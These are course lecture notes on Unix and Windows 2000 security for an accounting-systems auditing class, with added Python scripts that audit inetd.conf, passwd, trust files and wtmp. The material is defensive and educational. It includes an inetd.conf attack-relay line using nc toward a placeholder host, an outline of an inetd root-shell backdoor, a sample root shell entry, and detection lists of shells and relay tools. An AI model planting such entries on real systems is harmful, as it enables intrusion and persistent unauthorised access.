Overview of Unix. Jagdish S. Gangolly School of Business State University of New York at Albany

Overview of Unix

Jagdish S. Gangolly

School of Business

State University of New York at Albany

NOTE: These notes are based on the book Counter Hack, by Ed Skoudis and are prepared solely for the students in the course Acc 661 at SUNY Albany. They are not to be used by others without the permission of the instructor.

Acc 661 Auditing of Adv Acctg Systems (Spring 2003) Gangolly


Overview of Unix

  • Architecture

    • File System Structure

    • Kernel and processes

    • Account groups



Architecture: File System Structure

  • Hierarchical, rooted at /

    /
      bin  dev  etc  home  lib  mnt  proc  tmp  usr  var
      etc/passwd  etc/group  usr/bin  usr/man  usr/sbin



Architecture: Kernel & Processes I

  • CPU can run at most one program at a time

  • Kernel schedules processes, allocates and manages memory, and prevents one process from accessing memory belonging to other processes

  • Daemons (background processes) perform print spooling, network services, file-sharing, web access, remote management capabilities, etc.



Architecture: Kernel & Processes II

  • Automatically starting processes:

    • Init: parent of all user-level processes (/etc/init.d)

      • Httpd (port 80), Sendmail (port 25), NFS

    • Inetd (/etc/inetd.conf)

      • Echo, Chargen, FTPd, Telnetd, Shell, login, TFTP

    • Cron

  • Vulnerability:

    • Use of inetd.conf to create attack relays

      11111 stream tcp nowait nobody /usr/sbin/tcpd /usr/bin/nc [next_hop] 54321



Architecture: Kernel & Processes III

  • Vulnerability: Create a backdoor using Inetd

    • Overflow a buffer in a program running with root level privileges

    • Run a shell command to insert a line into the inetd.conf file (the line sets up a high order tcp port, running as root a command shell to execute any commands received)

    • The killall command sends a HUP signal to the inetd process, making it reread the configuration file

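Both the relay line on the previous slide and the root shell bound to a high port described here leave a visible trace in inetd.conf itself, so auditing that file is the natural detective control. The following Python audit is an added example, not code from the slides or from Counter Hack; the sample configuration and the next_hop placeholder in it are constructed.

```python
# Constructed inetd.conf sample: two normal services, the relay line from the
# slide (next_hop is a placeholder), and a root shell bound to a high port.
SAMPLE_INETD_CONF = """\
# inetd.conf (constructed sample)
ftp     stream  tcp  nowait  root    /usr/sbin/tcpd  in.ftpd -l -a
telnet  stream  tcp  nowait  root    /usr/sbin/tcpd  in.telnetd
11111   stream  tcp  nowait  nobody  /usr/sbin/tcpd  /usr/bin/nc next_hop 54321
33333   stream  tcp  nowait  root    /bin/sh         sh -i
"""

SHELLS = {"sh", "bash", "ksh", "csh", "tcsh", "zsh"}
RELAY_TOOLS = {"nc", "netcat", "ncat", "socat"}


def parse_inetd(text):
    """Yield one dict per active entry; comments and blank lines are skipped."""
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split(None, 6)   # service socktype proto wait user server [args]
        if len(fields) < 6:
            continue                   # malformed entry, not enough fields
        service, socktype, proto, wait, user, server = fields[:6]
        yield {"lineno": lineno, "service": service, "socktype": socktype,
               "proto": proto, "wait": wait, "user": user, "server": server,
               "args": fields[6] if len(fields) > 6 else ""}


def audit_entry(entry):
    """Return the reasons (possibly none) this entry looks like a relay or backdoor."""
    reasons = []
    # Basenames of the server program and every argument (tcpd wrappers hide the real program in args)
    progs = {entry["server"].rsplit("/", 1)[-1]}
    progs |= {a.rsplit("/", 1)[-1] for a in entry["args"].split()}
    if entry["service"].isdigit() and int(entry["service"]) > 1024:
        reasons.append("numeric high port instead of a named service")
    if progs & RELAY_TOOLS:
        reasons.append("server program is a network relay tool")
    if progs & SHELLS:
        reasons.append("server program is a shell bound to a socket")
    if entry["user"] == "root" and progs & (SHELLS | RELAY_TOOLS):
        reasons.append("shell/relay runs as root")
    return reasons


def audit_inetd(text):
    """Map line number -> reasons for every suspicious entry in an inetd.conf."""
    findings = {}
    for entry in parse_inetd(text):
        reasons = audit_entry(entry)
        if reasons:
            findings[entry["lineno"]] = reasons
    return findings
```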


Accounts and Groups

  • /etc/passwd

    • Login name, encrypted/hashed password, UID number, default GID number, GECOS information, home directory, login shell

    • Vulnerability: Password attacks

      • Guessing, login scripts, L0phtCrack (win), John the Ripper

  • /etc/group

  • Unix permissions

  • SetUID

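The seven passwd fields listed above are what an auditor checks first: an empty password field, a hash left in the world-readable passwd file (the input a cracker such as John the Ripper needs) and extra or shared UID-0 accounts. The Python check below is an added example, not from the slides or Counter Hack; the passwd sample and its hash value are constructed.

```python
# Constructed /etc/passwd sample; each line has the seven fields named on the slide:
# login, password field, UID, GID, GECOS, home directory, login shell.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice Example:/home/alice:/bin/bash
bob:$1$saltsalt$0123456789abcdefghijkl:1001:1001:Bob:/home/bob:/bin/bash
toor::0:0:second root:/root:/bin/sh
"""

FIELDS = ("login", "password", "uid", "gid", "gecos", "home", "shell")
LOCKED = {"x", "*", "!", "!!"}   # markers meaning "shadowed" or "locked", not a hash


def parse_passwd(text):
    """Parse passwd-format text into a list of field dicts (malformed lines skipped)."""
    entries = []
    for raw in text.splitlines():
        if not raw.strip() or raw.startswith("#"):
            continue
        parts = raw.split(":")
        if len(parts) != 7:
            continue
        entry = dict(zip(FIELDS, parts))
        entry["uid"], entry["gid"] = int(entry["uid"]), int(entry["gid"])
        entries.append(entry)
    return entries


def audit_passwd(text):
    """Map login -> reasons for entries that weaken password or privilege control."""
    entries = parse_passwd(text)
    uid_count = {}
    for e in entries:
        uid_count[e["uid"]] = uid_count.get(e["uid"], 0) + 1
    findings = {}
    for e in entries:
        reasons = []
        pw = e["password"]
        if pw == "":
            reasons.append("empty password field: login without a password")
        elif pw not in LOCKED and not pw.startswith(("!", "*")):
            reasons.append("hash kept in world-readable passwd: offline cracking target")
        if e["uid"] == 0 and e["login"] != "root":
            reasons.append("extra UID-0 account")
        if uid_count[e["uid"]] > 1:
            reasons.append(f"UID {e['uid']} shared with another account")
        if reasons:
            findings[e["login"]] = reasons
    return findings
```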


Miscellaneous

  • Unix trust

    • /etc/hosts.equiv

    • .rhosts

    • R-commands

      • rlogin, rsh, rcp, …

      • Vulnerable to IP-spoofing

  • Logs and auditing

    • /var/log/secure

    • /var/log/messages

    • /var/log/httpd, /var/log/cron,…

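/etc/hosts.equiv and ~/.rhosts grant password-free r-command logins to the listed host (and optionally user) pairs, and because the trust is keyed on the client's address it is spoofable, as the slide notes; a "+" wildcard removes even that weak check. The parser below is an added example, not from the slides or Counter Hack, with constructed sample files.

```python
# Constructed samples of the two trust files (not taken from any real host).
SAMPLE_HOSTS_EQUIV = """\
# hosts trusted system-wide
fileserver.example.com
+
-badhost.example.com
"""
SAMPLE_RHOSTS = """\
workstation.example.com alice
+ +
"""


def parse_trust_file(text):
    """Yield (host, user) pairs from hosts.equiv/.rhosts syntax; user is None if omitted."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        yield parts[0], (parts[1] if len(parts) > 1 else None)


def audit_trust_file(text):
    """Return (host, user, reason) for entries that trust any host or any user."""
    findings = []
    for host, user in parse_trust_file(text):
        if host == "+" and user == "+":
            findings.append((host, user, "any user from any host may log in without a password"))
        elif host == "+":
            findings.append((host, user, "any host trusted; no address check left to spoof"))
        elif user == "+":
            findings.append((host, user, f"any user on {host} may log in as this account"))
        elif host.startswith("-"):
            continue   # explicit denial entry, not a trust grant
    return findings
```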


Miscellaneous

  • utmp – who

  • wtmp – last

  • lastlog – time of user’s last login

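who, last and lastlog are front ends over fixed-size binary records, and reading wtmp directly is how an auditor reconstructs login sessions when those tools (or the files) are not trusted. The parser below is an added example, not from the slides or Counter Hack; it assumes the glibc utmp layout on Linux x86_64 (384-byte little-endian records) and builds its own constructed sample records.

```python
import struct

# glibc utmp record on Linux x86_64 (384 bytes): ut_type, pad, ut_pid, ut_line[32],
# ut_id[4], ut_user[32], ut_host[256], exit status (2 shorts), ut_session,
# ut_tv (sec, usec as int32), ut_addr_v6[4], 20 reserved bytes.  Assumed layout.
UTMP_FMT = "<h2xi32s4s32s256shhiii4i20x"
UTMP_SIZE = struct.calcsize(UTMP_FMT)   # 384
USER_PROCESS, DEAD_PROCESS = 7, 8        # ut_type values for login and logout


def cstr(b):
    """Decode a NUL-padded fixed-width char array."""
    return b.split(b"\0", 1)[0].decode("latin-1")


def make_record(ut_type, pid, line, user, host, tv_sec):
    """Build one constructed utmp record (used here only to fabricate sample data)."""
    return struct.pack(UTMP_FMT, ut_type, pid, line.encode(), b"", user.encode(),
                       host.encode(), 0, 0, 0, tv_sec, 0, 0, 0, 0, 0)


def parse_wtmp(data):
    """Parse wtmp bytes into a list of record dicts; a trailing partial record is ignored."""
    records = []
    for off in range(0, len(data) - len(data) % UTMP_SIZE, UTMP_SIZE):
        f = struct.unpack_from(UTMP_FMT, data, off)
        records.append({"type": f[0], "pid": f[1], "line": cstr(f[2]),
                        "user": cstr(f[4]), "host": cstr(f[5]), "time": f[9]})
    return records


def sessions(records):
    """Pair each USER_PROCESS login with the DEAD_PROCESS logout on the same tty, as last(1) does."""
    open_by_line, result = {}, []
    for r in records:
        if r["type"] == USER_PROCESS:
            open_by_line[r["line"]] = r
        elif r["type"] == DEAD_PROCESS and r["line"] in open_by_line:
            login = open_by_line.pop(r["line"])
            result.append((login["user"], login["host"], login["time"], r["time"]))
    # Logins with no matching logout record are still open (logout time None)
    result.extend((r["user"], r["host"], r["time"], None) for r in open_by_line.values())
    return result


# Constructed sample wtmp: alice logs in and out on pts/0, bob is still logged in on pts/1.
SAMPLE_WTMP = b"".join([
    make_record(USER_PROCESS, 1201, "pts/0", "alice", "10.0.0.5", 1041379200),
    make_record(USER_PROCESS, 1340, "pts/1", "bob", "198.51.100.7", 1041382800),
    make_record(DEAD_PROCESS, 1201, "pts/0", "", "", 1041386400),
])
```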


Windows 2000

  • Domains: share authentication database

    • Primary Domain Controller (PDC)

    • Backup Domain Controller (BDC)

    • SAM database

  • Shares: remote connections to network devices

  • Service packs and hotfixes



Windows 2000: Architecture

  • User Mode

  • Kernel Mode

    • Executive Subsystems

    • Hardware Abstraction Layer

  • Accounts and groups

    • Default accounts (Administrator, Guest)

    • Created by administrator

    • Groups: Global and local



Windows 2000: Architecture II

  • Privileges: Administrators, users, guests

    • Rights: things users can do that can be added or revoked

    • Abilities: built-in capabilities of groups that cannot be altered

  • Policies:

    • Account policy

    • User properties settings

  • Trust: No trust, Complete trust, Master domain, Multiple master domain



Windows 2000: Architecture III

  • Auditing

    • System Logging

    • Security Logging: logons/logoffs, files/object access, use of rights,…

    • Application Logging

  • Object access control and permissions

    • Ownership

    • NTFS permissions: No access, Read, Change, Full control

    • Share permissions


